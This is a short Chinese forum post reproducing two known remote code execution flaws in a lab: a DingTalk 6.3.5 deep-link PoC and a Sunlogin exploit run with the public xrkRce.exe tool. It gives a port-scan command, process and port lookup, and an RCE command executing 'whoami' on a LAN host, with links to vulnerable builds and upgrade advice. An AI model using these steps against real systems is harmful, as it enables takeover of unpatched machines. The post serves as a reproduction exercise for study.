钉钉RCE & 向日葵RCE 复现

admin 4月前 379


钉钉RCE


1. 影响版本

    6.3.5


    2. poc

      dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true


      3. 本地使用hfs搭建服务


      4. 下载受漏洞影响的版本

       

        链接:https://pan.baidu.com/s/1ozrwoqjzwASgONavgc94OQ
        提取码:9bcw

        登录该版本钉钉之后,直接发送poc而后点击即可触发


        当然了,修复方式极其简单,升级为6.3.30即可(钉钉运行结束后会自动升级)


        向日葵RCE 复现

        1. 前往github下载受影响的版本

          链接:https://pan.baidu.com/s/1O0EY-JRblNuGa8q3mfWxUQ 提取码:XVFD

          https://github.com/Mr-xn/sunlogin_rce

          2. 安装向日葵即可,版本如下


          3. 运行xrkRce.exe工具,需要go环境

            xrkRce.exe -h 192.168.43.157 -t scan -p 1-65535

             

            获取可能存在的向日葵端口号


            不知道为啥,我扫了三遍才扫到这个端口,所以其实有时候不是没开端口,而是没扫到,可能是受环境影响,所以若是大家扫不到,只需要确定一下向日葵是否开启,而后使用第二种方式去定位该端口号

             

            进入命令行模式后,输入命令 tasklist 可获取正在运行的进程,找到向日葵的进程即可


            可以看到,竟然有三个进程,我们查看第一个 30552


              netatst -ano | findstr "30552"


              顺利找到此端口


              而后返回值exp下执行如下命令即可;现官方已修复该漏洞,升级到最新版本即可


                xrkRce.exe -h 192.168.43.157 -t rce -p 28193 -c "whoami"


                最新回复 (0)
                返回
                发新帖